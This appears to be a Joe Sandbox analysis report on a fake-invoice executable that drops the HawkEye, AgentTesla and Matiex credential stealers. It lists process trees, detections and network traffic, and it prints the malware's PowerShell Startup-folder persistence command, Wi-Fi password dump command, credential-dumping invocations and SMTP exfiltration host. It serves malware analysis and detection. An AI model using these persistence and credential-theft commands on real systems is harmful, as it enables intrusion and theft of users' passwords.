Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report PO_Invoices_pdf.exe

Overview

General Information

Sample Name:PO_Invoices_pdf.exe
Analysis ID:347154
MD5:59d7d8d5dd3e0055e7c0dcc75897f569
SHA1:b249b28d088d54e971e2d9d8b2688440f8e6d513
SHA256:ef715cd322f0a805a68840b215c062f2e254977170a11c6800d836eac781fabb
Tags:exeHawkEyeYahoo

Most interesting Screenshot:

Detection

HawkEye AgentTesla MailPassView Matiex
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Detected HawkEye Rat
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Capture Wi-Fi password
Yara detected AgentTesla
Yara detected AntiVM_3
Yara detected HawkEye Keylogger
Yara detected MailPassView
Yara detected Matiex Keylogger
.NET source code contains potential unpacker
.NET source code contains very large array initializations
.NET source code references suspicious native API functions
Allocates memory in foreign processes
Bypasses PowerShell execution policy
Changes the view of files in windows explorer (hidden files and folders)
Contains functionality to log keystrokes (.Net Source)
Drops PE files to the startup folder
Found evasive API chain (trying to detect sleep duration tampering with parallel thread)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Installs a global keyboard hook
Machine Learning detection for dropped file
Machine Learning detection for sample
May check the online IP address of the machine
Powershell drops PE file
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sample uses process hollowing technique
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal WLAN passwords
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file access)
Uses netsh to modify the Windows network and firewall settings
Writes to foreign memory regions
Yara detected WebBrowserPassView password recovery tool
Adds / modifies Windows certificates
Antivirus or Machine Learning detection for unpacked file
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May infect USB drives
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE file contains strange resources
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Stores files to the Windows start menu directory
Tries to load missing DLLs
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match

Classification

Startup

  • System is w10x64
  • PO_Invoices_pdf.exe (PID: 5372 cmdline: 'C:\Users\user\Desktop\PO_Invoices_pdf.exe' MD5: 59D7D8D5DD3E0055E7C0DCC75897F569)
    • powershell.exe (PID: 5904 cmdline: 'Powershell.exe' -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\Desktop\PO_Invoices_pdf.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\I$s#$lT3ssl.exe' MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 8 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • RegAsm.exe (PID: 4888 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe MD5: 6FD7592411112729BF6B1F2F6C34899F)
      • hawkgoods.exe (PID: 3724 cmdline: 'C:\Users\user~1\AppData\Local\Temp\hawkgoods.exe' 0 MD5: FFDB58533D5D1362E896E96FB6F02A95)
        • dw20.exe (PID: 6684 cmdline: dw20.exe -x -s 2164 MD5: 8D10DA8A3E11747E51F23C882C22BBC3)
        • vbc.exe (PID: 6852 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt' MD5: C63ED21D5706A527419C9FBD730FFB2E)
        • vbc.exe (PID: 6868 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt' MD5: C63ED21D5706A527419C9FBD730FFB2E)
        • WerFault.exe (PID: 7028 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3724 -s 1996 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
      • origigoods40.exe (PID: 6172 cmdline: 'C:\Users\user~1\AppData\Local\Temp\origigoods40.exe' 0 MD5: AE36F0D16230B9F41FFECBD3C5B1D660)
      • Matiexgoods.exe (PID: 6264 cmdline: 'C:\Users\user~1\AppData\Local\Temp\Matiexgoods.exe' 0 MD5: 80C61B903400B534858D047DD0919F0E)
        • netsh.exe (PID: 1744 cmdline: 'netsh' wlan show profile MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807)
          • conhost.exe (PID: 1200 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • origigoods20.exe (PID: 6352 cmdline: 'C:\Users\user~1\AppData\Local\Temp\origigoods20.exe' 0 MD5: 61DC57C6575E1F3F2AE14C1B332AD2FB)
  • I$s#$lT3ssl.exe (PID: 1808 cmdline: 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\I$s#$lT3ssl.exe' MD5: 59D7D8D5DD3E0055E7C0DCC75897F569)
    • powershell.exe (PID: 6908 cmdline: 'Powershell.exe' -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\I$s#$lT3ssl.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\I$s#$lT3ssl.exe' MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6980 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • RegAsm.exe (PID: 4828 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe MD5: 6FD7592411112729BF6B1F2F6C34899F)
      • hawkgoods.exe (PID: 5440 cmdline: 'C:\Users\user~1\AppData\Local\Temp\hawkgoods.exe' 0 MD5: FFDB58533D5D1362E896E96FB6F02A95)
        • dw20.exe (PID: 5252 cmdline: dw20.exe -x -s 2092 MD5: 8D10DA8A3E11747E51F23C882C22BBC3)
        • vbc.exe (PID: 5776 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt' MD5: C63ED21D5706A527419C9FBD730FFB2E)
        • vbc.exe (PID: 6108 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt' MD5: C63ED21D5706A527419C9FBD730FFB2E)
        • WerFault.exe (PID: 4776 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5440 -s 940 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
      • origigoods40.exe (PID: 3080 cmdline: 'C:\Users\user~1\AppData\Local\Temp\origigoods40.exe' 0 MD5: AE36F0D16230B9F41FFECBD3C5B1D660)
      • Matiexgoods.exe (PID: 6532 cmdline: 'C:\Users\user~1\AppData\Local\Temp\Matiexgoods.exe' 0 MD5: 80C61B903400B534858D047DD0919F0E)
      • origigoods20.exe (PID: 7160 cmdline: 'C:\Users\user~1\AppData\Local\Temp\origigoods20.exe' 0 MD5: 61DC57C6575E1F3F2AE14C1B332AD2FB)
  • cleanup

Malware Configuration

Threatname: HawkEye

{"Modules": ["WebBrowserPassView", "mailpv", "Mail PassView"], "Version": ""}

Threatname: Agenttesla

{"Username: ": "", "URL: ": "", "To: ": "", "ByHost: ": "smtp.privateemail.com:587", "Password: ": "", "From: ": ""}

Yara Overview

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\origigoods20.exeJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    C:\Users\user\AppData\Local\Temp\origigoods40.exeJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      C:\Users\user\AppData\Local\Temp\Matiexgoods.exeJoeSecurity_MatiexYara detected Matiex KeyloggerJoe Security
        dropped/hawkgoods.exeHKTL_NET_GUID_StealerDetects c# red/black-team tools via typelibguidArnim Rupp
        • 0x7423:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
        C:\Users\user\AppData\Local\Temp\hawkgoods.exeHKTL_NET_GUID_StealerDetects c# red/black-team tools via typelibguidArnim Rupp
        • 0x7423:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
        Click to see the 10 entries

        Memory Dumps

        SourceRuleDescriptionAuthorStrings
        00000005.00000003.273863512.0000000003E4D000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          00000005.00000003.285132773.0000000003DE1000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            0000001F.00000000.423374232.0000000000722000.00000002.00020000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              0000001A.00000003.425880345.0000000003A2D000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                00000023.00000002.465758929.0000000000400000.00000040.00000001.sdmpJoeSecurity_WebBrowserPassViewYara detected WebBrowserPassView password recovery toolJoe Security
                  Click to see the 99 entries

                  Unpacked PEs

                  SourceRuleDescriptionAuthorStrings
                  17.2.vbc.exe.400000.0.unpackJoeSecurity_MailPassViewYara detected MailPassViewJoe Security
                    7.0.origigoods40.exe.c30000.0.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                      35.2.vbc.exe.400000.0.raw.unpackJoeSecurity_WebBrowserPassViewYara detected WebBrowserPassView password recovery toolJoe Security
                        28.2.origigoods40.exe.e20000.0.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                          31.2.origigoods20.exe.720000.0.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                            Click to see the 271 entries

                            Sigma Overview

                            System Summary:

                            barindex
                            Sigma detected: Capture Wi-Fi passwordShow sources
                            Source: Process startedAuthor: Joe Security: Data: Command: 'netsh' wlan show profile, CommandLine: 'netsh' wlan show profile, CommandLine|base64offset|contains: V, Image: C:\Windows\SysWOW64\netsh.exe, NewProcessName: C:\Windows\SysWOW64\netsh.exe, OriginalFileName: C:\Windows\SysWOW64\netsh.exe, ParentCommandLine: 'C:\Users\user~1\AppData\Local\Temp\Matiexgoods.exe' 0, ParentImage: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe, ParentProcessId: 6264, ProcessCommandLine: 'netsh' wlan show profile, ProcessId: 1744

                            Signature Overview

                            Click to jump to signature section

                            Show All Signature Results

                            AV Detection:

                            barindex
                            Antivirus detection for dropped fileShow sources
                            Source: C:\Users\user\AppData\Local\Temp\origigoods40.exeAvira: detection malicious, Label: TR/Spy.Gen8
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeAvira: detection malicious, Label: TR/AD.MExecute.lzrac
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeAvira: detection malicious, Label: SPR/Tool.MailPassView.473
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeAvira: detection malicious, Label: TR/Spy.Gen8
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeAvira: detection malicious, Label: TR/Redcap.jajcu
                            Found malware configurationShow sources
                            Source: RegAsm.exe.4888.5.memstrMalware Configuration Extractor: HawkEye {"Modules": ["WebBrowserPassView", "mailpv", "Mail PassView"], "Version": ""}
                            Source: hawkgoods.exe.3724.6.memstrMalware Configuration Extractor: Agenttesla {"Username: ": "", "URL: ": "", "To: ": "", "ByHost: ": "smtp.privateemail.com:587", "Password: ": "", "From: ": ""}
                            Multi AV Scanner detection for dropped fileShow sources
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeMetadefender: Detection: 43%Perma Link
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeReversingLabs: Detection: 89%
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeReversingLabs: Detection: 95%
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeMetadefender: Detection: 40%Perma Link
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeReversingLabs: Detection: 85%
                            Source: C:\Users\user\AppData\Local\Temp\origigoods40.exeMetadefender: Detection: 37%Perma Link
                            Source: C:\Users\user\AppData\Local\Temp\origigoods40.exeReversingLabs: Detection: 82%
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\I$s#$lT3ssl.exeReversingLabs: Detection: 19%
                            Multi AV Scanner detection for submitted fileShow sources
                            Source: PO_Invoices_pdf.exeReversingLabs: Detection: 17%
                            Machine Learning detection for dropped fileShow sources
                            Source: C:\Users\user\AppData\Local\Temp\origigoods40.exeJoe Sandbox ML: detected
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\I$s#$lT3ssl.exeJoe Sandbox ML: detected
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeJoe Sandbox ML: detected
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeJoe Sandbox ML: detected
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeJoe Sandbox ML: detected
                            Machine Learning detection for sampleShow sources
                            Source: PO_Invoices_pdf.exeJoe Sandbox ML: detected
                            Source: 30.0.Matiexgoods.exe.bd0000.0.unpackAvira: Label: TR/Redcap.jajcu
                            Source: 8.2.Matiexgoods.exe.f70000.0.unpackAvira: Label: TR/Redcap.jajcu
                            Source: 27.2.hawkgoods.exe.a40000.0.unpackAvira: Label: TR/AD.MExecute.lzrac
                            Source: 27.2.hawkgoods.exe.a40000.0.unpackAvira: Label: SPR/Tool.MailPassView.473
                            Source: 6.0.hawkgoods.exe.2f0000.0.unpackAvira: Label: TR/AD.MExecute.lzrac
                            Source: 6.0.hawkgoods.exe.2f0000.0.unpackAvira: Label: SPR/Tool.MailPassView.473
                            Source: 30.2.Matiexgoods.exe.bd0000.0.unpackAvira: Label: TR/Redcap.jajcu
                            Source: 26.2.RegAsm.exe.400000.0.unpackAvira: Label: TR/AD.MExecute.lzrac
                            Source: 26.2.RegAsm.exe.400000.0.unpackAvira: Label: SPR/Tool.MailPassView.473
                            Source: 26.2.RegAsm.exe.400000.0.unpackAvira: Label: TR/Redcap.jajcu
                            Source: 26.2.RegAsm.exe.400000.0.unpackAvira: Label: TR/Spy.Gen8
                            Source: 26.2.RegAsm.exe.4031bf.2.unpackAvira: Label: TR/Inject.vcoldi
                            Source: 8.0.Matiexgoods.exe.f70000.0.unpackAvira: Label: TR/Redcap.jajcu
                            Source: 5.2.RegAsm.exe.400000.0.unpackAvira: Label: TR/AD.MExecute.lzrac
                            Source: 5.2.RegAsm.exe.400000.0.unpackAvira: Label: SPR/Tool.MailPassView.473
                            Source: 5.2.RegAsm.exe.400000.0.unpackAvira: Label: TR/Redcap.jajcu
                            Source: 5.2.RegAsm.exe.400000.0.unpackAvira: Label: TR/Spy.Gen8
                            Source: 6.2.hawkgoods.exe.2f0000.0.unpackAvira: Label: TR/AD.MExecute.lzrac
                            Source: 6.2.hawkgoods.exe.2f0000.0.unpackAvira: Label: SPR/Tool.MailPassView.473
                            Source: 23.2.I$s#$lT3ssl.exe.4158f3f.3.unpackAvira: Label: TR/Inject.vcoldi
                            Source: 27.0.hawkgoods.exe.a40000.0.unpackAvira: Label: TR/AD.MExecute.lzrac
                            Source: 27.0.hawkgoods.exe.a40000.0.unpackAvira: Label: SPR/Tool.MailPassView.473
                            Source: 0.2.PO_Invoices_pdf.exe.4396d80.5.unpackAvira: Label: TR/Inject.vcoldi
                            Source: 5.2.RegAsm.exe.4031bf.1.unpackAvira: Label: TR/Inject.vcoldi
                            Source: 0.2.PO_Invoices_pdf.exe.4398f3f.4.unpackAvira: Label: TR/Inject.vcoldi
                            Source: 23.2.I$s#$lT3ssl.exe.4156d80.4.unpackAvira: Label: TR/Inject.vcoldi

                            Compliance:

                            barindex
                            Uses 32bit PE filesShow sources
                            Source: PO_Invoices_pdf.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                            Uses insecure TLS / SSL version for HTTPS connectionShow sources
                            Source: unknownHTTPS traffic detected: 104.21.19.200:443 -> 192.168.2.7:49733 version: TLS 1.0
                            Source: unknownHTTPS traffic detected: 104.21.19.200:443 -> 192.168.2.7:49785 version: TLS 1.0
                            Uses new MSVCR DllsShow sources
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll
                            Contains modern PE file flags such as dynamic base (ASLR) or NXShow sources
                            Source: PO_Invoices_pdf.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                            Binary contains paths to debug symbolsShow sources
                            Source: Binary string: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdb source: hawkgoods.exe, 00000006.00000002.386288521.00000000026D7000.00000004.00000040.sdmp
                            Source: Binary string: mscorlib.pdbHs source: hawkgoods.exe, 00000006.00000002.398710420.000000000782A000.00000004.00000010.sdmp
                            Source: Binary string: mscorlib.pdbTD~1\AppData\Local\Temp\hawkgoods.exeAAGZ source: hawkgoods.exe, 00000006.00000002.386288521.00000000026D7000.00000004.00000040.sdmp
                            Source: Binary string: mscorlib.pdb source: hawkgoods.exe, 00000006.00000002.386288521.00000000026D7000.00000004.00000040.sdmp
                            Source: Binary string: mscorlib.pdbcorlib.pdbpdblib.pdb2.0.0.0__b77a5c561934e089\mscorlib.pdbm source: hawkgoods.exe, 00000006.00000002.398710420.000000000782A000.00000004.00000010.sdmp
                            Source: Binary string: RunPE.pdb source: PO_Invoices_pdf.exe, 00000000.00000002.277173827.00000000030A1000.00000004.00000001.sdmp
                            Source: Binary string: C:\Users\Jovan\Documents\Visual Studio 2010\Projects\Stealer\CMemoryExecute\CMemoryExecute\obj\Release\CMemoryExecute.pdb source: PO_Invoices_pdf.exe, 00000000.00000002.277417941.00000000040A8000.00000004.00000001.sdmp, RegAsm.exe, 00000005.00000003.281965972.0000000003BE0000.00000004.00000001.sdmp, hawkgoods.exe
                            Source: Binary string: C:\Windows\assembly\GA.pdbmscorlib\2.0.0.0__b77a5c561934e089\mscorlib.dll source: hawkgoods.exe, 00000006.00000002.398710420.000000000782A000.00000004.00000010.sdmp
                            Source: Binary string: indows\mscorlib.pdbpdblib.pdb source: hawkgoods.exe, 00000006.00000002.386288521.00000000026D7000.00000004.00000040.sdmp
                            Source: Binary string: f:\Projects\VS2005\mailpv\Release\mailpv.pdb source: PO_Invoices_pdf.exe, 00000000.00000002.277417941.00000000040A8000.00000004.00000001.sdmp, RegAsm.exe, 00000005.00000003.281965972.0000000003BE0000.00000004.00000001.sdmp, hawkgoods.exe
                            Source: Binary string: C:\Windows\mscorlib.pdbl source: hawkgoods.exe, 00000006.00000002.386288521.00000000026D7000.00000004.00000040.sdmp
                            Source: Binary string: C:\Windows\dll\mscorlib.pdb source: hawkgoods.exe, 00000006.00000002.386288521.00000000026D7000.00000004.00000040.sdmp
                            Source: Binary string: f:\Projects\VS2005\WebBrowserPassView\Release\WebBrowserPassView.pdb source: PO_Invoices_pdf.exe, 00000000.00000002.277417941.00000000040A8000.00000004.00000001.sdmp, RegAsm.exe, 00000005.00000003.281965972.0000000003BE0000.00000004.00000001.sdmp, hawkgoods.exe
                            Source: Binary string: symbols\dll\mscorlib.pdb7w source: hawkgoods.exe, 00000006.00000002.398710420.000000000782A000.00000004.00000010.sdmp
                            Source: Binary string: oC:\Windows\mscorlib.pdb source: hawkgoods.exe, 00000006.00000002.398710420.000000000782A000.00000004.00000010.sdmp
                            Source: Binary string: C:\Windows\symbols\dll\mscorlib.pdb source: hawkgoods.exe, 00000006.00000002.386288521.00000000026D7000.00000004.00000040.sdmp
                            Source: Binary string: D:\Before FprmT\Document VB project\FireFox Stub\FireFox Stub\obj\Debug\VNXT.pdb source: PO_Invoices_pdf.exe, 00000000.00000002.277417941.00000000040A8000.00000004.00000001.sdmp, RegAsm.exe, 00000005.00000002.287278765.0000000000403000.00000040.00000001.sdmp
                            Source: Binary string: mscorrc.pdb source: hawkgoods.exe, 00000006.00000002.391117104.0000000004E20000.00000002.00000001.sdmp
                            Source: Binary string: D:\Before FprmT\Document VB project\FireFox Stub\FireFox Stub\obj\Debug\VNXT.pdbh} source: PO_Invoices_pdf.exe, 00000000.00000002.277417941.00000000040A8000.00000004.00000001.sdmp, RegAsm.exe, 00000005.00000002.287278765.0000000000403000.00000040.00000001.sdmp
                            Source: PO_Invoices_pdf.exe, 00000000.00000002.277417941.00000000040A8000.00000004.00000001.sdmpBinary or memory string: autorun.inf
                            Source: PO_Invoices_pdf.exe, 00000000.00000002.277417941.00000000040A8000.00000004.00000001.sdmpBinary or memory string: [autorun]
                            Source: RegAsm.exe, 00000005.00000003.281965972.0000000003BE0000.00000004.00000001.sdmpBinary or memory string: autorun.inf
                            Source: RegAsm.exe, 00000005.00000003.281965972.0000000003BE0000.00000004.00000001.sdmpBinary or memory string: [autorun]
                            Source: hawkgoods.exeBinary or memory string: autorun.inf
                            Source: hawkgoods.exeBinary or memory string: [autorun]
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeCode function: 4x nop then lea esp, dword ptr [ebp-0Ch]
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeCode function: 4x nop then call 04B31B20h
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeCode function: 4x nop then lea esp, dword ptr [ebp-0Ch]
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeCode function: 4x nop then lea esp, dword ptr [ebp-0Ch]
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeCode function: 4x nop then lea esp, dword ptr [ebp-0Ch]
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeCode function: 4x nop then mov esp, ebp
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeCode function: 4x nop then lea esp, dword ptr [ebp-0Ch]
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeCode function: 4x nop then lea esp, dword ptr [ebp-0Ch]
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeCode function: 4x nop then jmp 04B31A73h
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeCode function: 4x nop then call 04B31B20h
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeCode function: 4x nop then lea esp, dword ptr [ebp-0Ch]
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeCode function: 4x nop then jmp 04B31A73h
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeCode function: 4x nop then lea esp, dword ptr [ebp-0Ch]
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeCode function: 4x nop then lea esp, dword ptr [ebp-0Ch]
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeCode function: 4x nop then lea esp, dword ptr [ebp-0Ch]
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeCode function: 4x nop then lea esp, dword ptr [ebp-0Ch]
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeCode function: 4x nop then lea esp, dword ptr [ebp-0Ch]
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeCode function: 4x nop then lea esp, dword ptr [ebp-0Ch]
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeCode function: 4x nop then lea esp, dword ptr [ebp-0Ch]
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeCode function: 4x nop then lea esp, dword ptr [ebp-0Ch]

                            Networking:

                            barindex
                            May check the online IP address of the machineShow sources
                            Source: unknownDNS query: name: whatismyipaddress.com
                            Source: unknownDNS query: name: whatismyipaddress.com
                            Source: unknownDNS query: name: whatismyipaddress.com
                            Source: unknownDNS query: name: whatismyipaddress.com
                            Source: unknownDNS query: name: whatismyipaddress.com
                            Source: unknownDNS query: name: checkip.dyndns.org
                            Source: unknownDNS query: name: checkip.dyndns.org
                            Source: unknownDNS query: name: checkip.dyndns.org
                            Source: unknownDNS query: name: checkip.dyndns.org
                            Source: unknownDNS query: name: whatismyipaddress.com
                            Source: unknownDNS query: name: whatismyipaddress.com
                            Source: unknownDNS query: name: whatismyipaddress.com
                            Source: unknownDNS query: name: whatismyipaddress.com
                            Source: unknownDNS query: name: whatismyipaddress.com
                            Source: unknownDNS query: name: checkip.dyndns.org
                            Source: unknownDNS query: name: checkip.dyndns.org
                            Source: unknownDNS query: name: checkip.dyndns.org
                            Source: unknownDNS query: name: checkip.dyndns.org
                            Source: global trafficTCP traffic: 192.168.2.7:49741 -> 199.193.7.228:587
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: whatismyipaddress.comConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: whatismyipaddress.comConnection: Keep-Alive
                            Source: Joe Sandbox ViewIP Address: 131.186.113.70 131.186.113.70
                            Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                            Source: global trafficTCP traffic: 192.168.2.7:49741 -> 199.193.7.228:587
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                            Source: unknownHTTPS traffic detected: 104.21.19.200:443 -> 192.168.2.7:49733 version: TLS 1.0
                            Source: unknownHTTPS traffic detected: 104.21.19.200:443 -> 192.168.2.7:49785 version: TLS 1.0
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeCode function: 6_2_00C6A14A recv,
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: whatismyipaddress.comConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
